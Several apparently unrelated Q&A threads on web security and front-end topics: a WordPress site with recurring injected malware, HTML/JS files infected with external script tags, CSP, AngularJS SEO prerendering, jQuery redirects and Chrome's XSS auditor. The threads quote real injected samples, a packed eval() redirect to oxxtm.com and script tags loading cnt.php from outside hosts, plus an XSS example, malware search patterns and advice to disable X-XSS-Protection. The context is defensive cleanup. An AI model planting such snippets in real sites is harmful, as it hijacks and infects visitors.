My WordPress blog keeps getting the following malicious script injected:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))
It navigates to:
http://oxxtm.com/ which redirects to:
http://www.html5website.com/
I have already disabled a few plugins, but the problem seems to be somewhere else, since the plugins I'm using all seem to have a good reputation:
Akismet
Captcha on Login
Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
SMTP Mailer
WooCommerce
If I can't find the root cause, would you recommend handling the "redirect" event to keep the site running? If so, how could I detect a redirect pointing to http://oxxtm.com/ and abort it using JavaScript?
I tried using the onunload and onbeforeunload events, but it seems like the injected eval runs before my event handler is even registered.
I can see that it gets injected into different PHP pages (sometimes only one, sometimes more) in WordPress, and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.
I have already removed the malicious script several times, but it gets injected again and again. I need to treat the symptom while I search for the cause, or the site will be out of service. However, I don't understand how the script is injected in the first place.
Search within all your files for the following content: eval(function(
It will show you every file that contains this code.
Otherwise, try searching for this: base64_decode
This is a function that decodes base64-encoded text; it is often used by malicious PHP files to inject code that you can't detect by searching for eval(.
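As an illustration, here is a minimal PHP sketch (the file name scan-injected.php and the extension list are my assumptions; drop it in the site root, run it once, then delete it) that recursively searches the installation for those two markers:
<?php
// scan-injected.php - hedged sketch: recursively list files that contain
// "eval(function(" or "base64_decode" so you can inspect them by hand.
$markers = array('eval(function(', 'base64_decode');
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator('.', FilesystemIterator::SKIP_DOTS)
);
foreach ($it as $file) {
    if (!in_array($file->getExtension(), array('php', 'js', 'html'))) {
        continue;
    }
    $content = file_get_contents($file->getPathname());
    foreach ($markers as $marker) {
        if (strpos($content, $marker) !== false) {
            echo $file->getPathname() . " contains " . $marker . "\n";
            break;
        }
    }
}
Note that legitimate WordPress core and plugin files also use base64_decode, so every hit still needs a manual look.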
If the problem persists, answer here and I'll try to help you.
Also, as an additional measure to protect your client side from XSS like that, I can suggest using CSP after cleaning your backend of the injection. You can read more about it here: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver bullet, but it's nice to have for protecting your users.
Is there a way to configure PHP/server (over Nginx php-fpm) to prevent javascript execution from php file_get_contents?
Right now, if I allow users to upload HTML files with JS embedded, the JS gets executed when the file is displayed through a file_get_contents() call.
I plan to add HTML filtering (i.e. deny HTML uploads), but it would be even better if I could have a second layer of security on the output, instead of only on the upload (in case the first layer fails to take some scenario into account).
Thanks
Kudos to jcubic for providing a link to an explanation of why his solution won't work ;)
There are only 2 robust solutions I know of:
1) use a markup language other than HTML which has a provable grammar and does not allow embedded scripting (BBCode?). This still requires that you validate the submission for compliance - but is simpler than for HTML.
2) apply a content security policy which does not allow inline JavaScript - this would be my preferred solution, not least because you can specify a reporting URL, allowing you to police what is happening in the browser rather than relying on filtering on the server.
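As a rough sketch of that policy (the exact directives and the /csp-report.php reporting endpoint are assumptions to adapt), sent from PHP before any output:
<?php
// Hedged example: allow scripts only from your own origin; inline scripts
// are blocked because 'unsafe-inline' is not listed. Violations are posted
// to the hypothetical /csp-report.php endpoint for logging.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; report-uri /csp-report.php");
While tuning the policy, you can send Content-Security-Policy-Report-Only instead, so violations are reported without breaking legitimate scripts.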
You can try to strip JavaScript before you echo the content of the file:
echo preg_replace("%<script[^>]*>.*?</script>%si", "", file_get_contents($file));
or you can call this when you upload the file so you don't have to do that each time.
You may also want to remove event attributes like onclick, and style attributes that contain URLs with the javascript: protocol; to remove those, you would probably be better off with an XML parser (see the sketch below).
Here is a list of XSS attack vectors that you can take into account: XSS Filter Evasion Cheat Sheet
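For illustration, a minimal sketch of that parser-based clean-up using PHP's DOMDocument (this is not a complete sanitizer; a maintained library such as HTML Purifier is the safer choice in practice):
<?php
// Hedged sketch: strip <script> elements, on* event attributes and
// javascript: URLs from an HTML fragment before echoing it.
function strip_scripts($html) {
    $doc = new DOMDocument();
    @$doc->loadHTML($html); // suppress warnings on malformed user HTML
    $xpath = new DOMXPath($doc);

    // Remove every <script> element.
    foreach ($xpath->query('//script') as $node) {
        $node->parentNode->removeChild($node);
    }

    // Remove on* attributes and attributes whose value starts with "javascript:".
    foreach ($xpath->query('//*') as $node) {
        $to_remove = array();
        foreach ($node->attributes as $attr) {
            if (strpos(strtolower($attr->name), 'on') === 0 ||
                stripos(trim($attr->value), 'javascript:') === 0) {
                $to_remove[] = $attr->name;
            }
        }
        foreach ($to_remove as $name) {
            $node->removeAttribute($name);
        }
    }
    return $doc->saveHTML();
}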
My application uses AngularJS for the frontend and .NET for the backend.
In my application I have a list view. On clicking each list item, it will fetch a pre-rendered HTML page from S3.
I am using Angular states.
app.js
...
state('staticpage', {
    url: "/staticpage",
    templateUrl: function () {
        return 'http://xxxxxxx.cloudfront.net/staticpage/staticpage1.html';
    },
    controller: 'StaticPageCtrl',
    title: 'Static Page'
})
StaticPage1.html
<div>
    Hello static world 1!
</div>
How do I do SEO here?
Do I really need to create HTML snapshots using PhantomJS or the like?
Yes, PhantomJS would do the trick, or you can use prerender.io; with that service you can just use their open-source renderer and run your own server.
Another way is to use the _escaped_fragment_ meta tag.
I hope this helps; if you have any questions, add comments and I will update my answer.
Do you know that Google renders HTML pages and executes the JavaScript code on the page, and does not need any pre-rendering anymore?
https://webmasters.googleblog.com/2014/05/understanding-web-pages-better.html
And take a look at these:
http://searchengineland.com/tested-googlebot-crawls-javascript-heres-learned-220157
http://wijmo.com/blog/how-to-improve-seo-in-angularjs-applications/
My project's front end is also built on top of Angular, and I decided to solve the SEO issue like this:
I've created an endpoint for all search engines (SE) where all requests with the _escaped_fragment_ parameter go;
I parse the HTTP request for the _escaped_fragment_ GET parameter;
I make a cURL request with the parsed category and article parameters and get the article content;
Then I render the simplest (and SEO-friendly) template for the SE with the article content, or throw a 404 Not Found exception if the article does not exist;
In total: I do not need to prerender any HTML pages or use prerender.io, I have a nice user interface for my users, and search engines index my pages very well.
P.S. Do not forget to generate a sitemap.xml and include in it all the URLs (with _escaped_fragment_) which you want to be indexed.
P.P.S. Unfortunately my project's back end is built on top of PHP, so I cannot show you an example that fits your stack exactly. But if you want more explanations, do not hesitate to ask.
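For illustration only, a rough PHP sketch of such an endpoint (the URL layout and the fetch_article() and render_seo_template() helpers are hypothetical, not functions from any real library):
<?php
// Hedged sketch of an _escaped_fragment_ endpoint for crawlers.
// fetch_article() (a cURL wrapper) and render_seo_template() are
// placeholders for your own backend code.
if (isset($_GET['_escaped_fragment_'])) {
    // e.g. "/category/my-article" as sent by the crawler
    $fragment = $_GET['_escaped_fragment_'];
    $parts = array_values(array_filter(explode('/', $fragment)));

    if (count($parts) === 2) {
        list($category, $article) = $parts;
        $content = fetch_article($category, $article);
        if ($content !== false) {
            echo render_seo_template($content); // plain, crawlable HTML
            exit;
        }
    }
    header('HTTP/1.0 404 Not Found');
    exit;
}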
Firstly, you cannot assume anything.
Google does say that their bots can understand JavaScript applications very well, but that is not true for all scenarios.
Start by using the "Fetch as Google" feature in Webmaster Tools for your link and see if the page is rendered properly. If yes, then you need not read further.
In case you see just your skeleton HTML, this is because Googlebot assumes the page load is complete before it actually completes. To fix this, you need an environment where you can recognize that a request is from a bot, and return a prerendered page to it.
To create such an environment, you need to make some changes to your code.
Follow the instructions in Setting up SEO with Angularjs and Phantomjs,
or alternatively just write code in any server-side language like PHP to generate prerendered HTML pages of your application.
(PhantomJS is not mandatory.)
Create a redirect rule in your server config which detects the bot and redirects it to the prerendered plain HTML files (the only thing you need to make sure of is that the content of the page you return matches the actual page content, otherwise bots might not consider the content authentic); a rough PHP sketch of the detection follows this answer.
Note that you also need to consider how you will make entries in sitemap.xml dynamically when you add pages to your application in the future.
If you are not looking for such overhead and you are short on time, you can certainly use a managed service like Prerender.
Eventually bots will mature enough to understand your application, and you will be able to say goodbye to your SEO proxy infrastructure. This is just for the time being.
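As a sketch of the PHP alternative mentioned in that answer (the user-agent list and the prerendered/ snapshot directory are assumptions), detecting a crawler and serving a static snapshot could look roughly like this:
<?php
// Hedged sketch: serve a prerendered HTML snapshot to known crawlers and
// fall through to the normal AngularJS application for everyone else.
$bots = array('googlebot', 'bingbot', 'yandex', 'baiduspider', 'facebookexternalhit');
$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');

$is_bot = false;
foreach ($bots as $bot) {
    if (strpos($ua, $bot) !== false) {
        $is_bot = true;
        break;
    }
}

if ($is_bot) {
    // Map the requested path to a snapshot, e.g. /staticpage -> prerendered/staticpage.html
    $path = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/');
    $file = 'prerendered/' . ($path === '' ? 'index' : basename($path)) . '.html';
    if (is_file($file)) {
        readfile($file);
        exit;
    }
}
Keep the snapshot content identical to what real users see, as noted above, or crawlers may treat it as cloaking.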
At this point in time, the question really becomes somewhat subjective, at least with Google -- it really depends on your specific site, like how quickly your pages render, how much content renders after the DOM loads, etc. Certainly (as #birju-shaw mentions) if Google can't read your page at all, you know you need to do something else.
Google has officially deprecated the _escaped_fragment_ approach as of October 14, 2015, but that doesn't mean you might not want to still pre-render.
YMMV on trusting Google (and other crawlers) for reasons stated here, so the only definitive way to find out which is best in your scenario would be to test it out. There could be other reasons you may want to pre-render, but since you mentioned SEO specifically, I'll leave it at that.
If you have a server-side templating system (PHP, Python, etc.) you can implement a solution like prerender.io.
If you only have AngularJS files hosted on a static server (e.g. Amazon S3), have a look at the answer in the following post: AngularJS SEO for static webpages (S3 CDN).
Yes, you need to prerender the page for the bots. prerender.io can be used, and your page must have the meta tag:
<meta name="fragment" content="!">
All the HTML and JS files on my website have been affected by some scripts.
The script below is inside all the HTML files:
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
and the script below is inside all the JS files:
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I don't know how this code got inside all the HTML and JS files. The <!--937592--> number and the src="http://jamesdeocariza.com/cnt.php?id=5653691" URL are not static; the number and URL are dynamic.
Is this a Cross-Site Scripting (XSS) attack?
If you are not the owner of the servers jamesdeocariza.com and brilleandmore.de, then it looks like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.
To explain XSS attacks: imagine you have a badly written PHP file which contains code like:
<p>Your username <?php echo $_GET["user"] ?></p>
Now someone can craft a malicious link to your site like http://example.com/index.php?user=<script>//bad things</script>. If someone clicks on such a link, the server will serve an HTML document with
<p>Your username <script>//bad things</script></p>
(In reality the link will be encoded using URL encoding with %XY sequences.)
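As a rough sketch of the usual fix for that example (not tied to your particular site), escaping the value before echoing it keeps injected markup from being interpreted as HTML:
<?php
// Hedged example: escape user input before echoing it into the page.
$user = isset($_GET['user']) ? $_GET['user'] : '';
?>
<p>Your username <?php echo htmlspecialchars($user, ENT_QUOTES, 'UTF-8'); ?></p>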
In your case it seems worse than just an XSS attack, because it appears that the attacker was somehow able to change the source code of your site. This may happen in many ways, such as hacking your PC or your server (maybe you have a virus on your PC), getting access to your source repository (for example by brute-forcing the password of your GitHub account), or a man-in-the-middle attack during an unencrypted FTP upload...
Your files have somehow been compromised, and the next steps you need to take are:
Remove the above 2 code snippets from all your JS and HTML files immediately.
Check whether your site has been blacklisted by Google using tools like Sucuri, find out which other files are affected, and remove the unwanted code from those pages.
If Google has already blacklisted your website, you will have to request a review AFTER cleaning all the infected files.
Search for unwanted dynamic code that is probably there as a result of this compromise, and remove those files.
Find out how the attack may have occurred and fix it (website access logs will come in handy here).
I am trying to clean up some files on a website, one task being to collate all references to jQuery into a single file.
Yes, it's a large site with multiple developers, and some standards have not been followed, resulting in the current situation where various versions of jQuery are referenced.
What I have tried to do is create a 301 redirect for these files to point to a single version.
e.g.: <script type="text/javascript" src="/someurl/js/jquery-1.4.4.min.js"> should end up pointing to /someurl/js/jquery-core.min.js
I have tried to do this, but it appears to fail to load the new file and jQuery does not exist. My Net panel shows that the original file has a 301 on it and I can see the reference to the new one; however, the "response" tab is empty.
Is it possible to use a 301 redirect in this way?
Thanks for any suggestions / feedback
P.S. I know there are better ways to reference jQuery etc., but large-company process and red tape prevent me from doing this any other way.
When a browser loads a script from the src attribute, it should follow all redirects, in the same way it retrieves HTML, images, stylesheets, etc. So the use case you've provided should work.
But since it's not working for you, you have a couple of options to resolve the problem.
Use Fiddler or a similar debugging proxy to see what's going on between your browser and the server. Perhaps the 301 is malformed, or perhaps the MIME type is misconfigured; it could be any number of things. Troubleshoot it the same way you'd troubleshoot any other issue where the browser isn't following redirects.
Or... instead of using redirects, you can use mod_rewrite (or a similar server-side URL rewriting tool) to rewrite the request for a particular version of the script to your canonical version.
In WebKit I get the following error on my JavaScript:
Refused to execute a JavaScript script. The source code of script found within request.
The code is for a JavaScript spinner, see ASCII Art.
The code used to work OK and is still working correctly in Camino and Firefox. The error only seems to be thrown when the page is saved via a POST and then retrieved via a GET. It happens in both Chrome/Mac and Safari/Mac.
Anyone know what this means, and how to fix this?
This "feature" can be disabled by sending the non-standard HTTP header X-XSS-Protection on the affected page.
X-XSS-Protection: 0
It's a security measure to prevent XSS (cross-site scripting) attacks.
This happens when some JavaScript code is sent to the server via an HTTP POST request, and the same code comes back via the HTTP response. If Chrome detects this situation, it refuses to run the script, and you get the error message Refused to execute a JavaScript script. Source code of script found within request.
Also see this blog post about Security in Depth: New Security Features.
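If your page happens to be served by PHP (an assumption; any backend can set the same header), disabling the auditor for a single response might look like this:
<?php
// Hedged example: disable the WebKit/Chrome XSS auditor for this response only.
// Only do this on pages where you understand and accept the risk.
header('X-XSS-Protection: 0');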
Short answer: refresh the page after making your initial submission of the JavaScript, or hit the URL that will display the page you're editing.
Long answer: because the text you filled into the form includes JavaScript, and the browser doesn't necessarily know that you are the source of the JavaScript, it is safer for the browser to assume that you are not the source of this JS, and not run it.
An example: suppose I sent you a link in your email or on Facebook with some JavaScript in it, and imagine that the JavaScript would message all your friends my cool link. The game of getting that link invoked then simply becomes: find a place to send the JavaScript such that it will be included in the page.
Chrome and other WebKit browsers try to mitigate this risk by not executing any JavaScript that is in the response if it was present in the request. My nefarious attack would be thwarted because your browser would never run that JS.
In your case, you're submitting it into a form field. The POST of the form will cause a render of the page that displays the JavaScript, causing the browser to worry. If your JavaScript is truly saved, however, hitting that same page without submitting the form will allow it to execute.
As others have said, this happens when an HTTP response contains a JavaScript and/or HTML string that was also in the request. This is usually caused by entering JS or HTML into a form field, but can also be triggered in other ways such as manually tweaking the URL's parameters.
The problem with this is that someone with bad intentions could put whatever JS they want as the value, link to that URL with the malicious JS value, and cause your users trouble.
In almost every case, this can be fixed by HTML encoding the response, though there are exceptions. For example, this will not be safe for content inside a <script> tag. Other specific cases can be handled differently - for example, injecting input into a URL is better served by URL encoding.
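As an illustrative sketch (assuming a PHP backend; the variable name is made up), the encoding should match the context where the value ends up:
<?php
// Hedged examples: encode according to the output context.
$input = isset($_GET['q']) ? $_GET['q'] : '';

// 1) HTML body context: escape HTML metacharacters.
echo '<p>' . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . '</p>';

// 2) URL context: percent-encode the value before placing it in a URL.
echo '<a href="/search?q=' . rawurlencode($input) . '">search</a>';

// 3) Script context: serialize as HTML-safe JSON instead of echoing raw text.
echo '<script>var query = ' . json_encode($input, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ';</script>';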
As Kendall Hopkins mentioned, there may be a few cases when you actually want JavaScript from form inputs to be executed, such as when creating an application like JSFiddle. In those cases, I'd recommend that you at least scrub through the input in your backend code before blindly writing it back. After that, you can use the method he mentioned to prevent the XSS blockage (at least in Chrome), but be aware that it opens you up to attackers.
I used this hacky PHP trick just after I commit to the database, but before the script is rendered from my _GET request:
// If the submitted content contained script, redirect via JS instead of re-rendering it.
if(!empty($_POST['contains_script'])) {
    echo "<script>document.location='template.php';</script>";
}
This was the cheapest solution for me.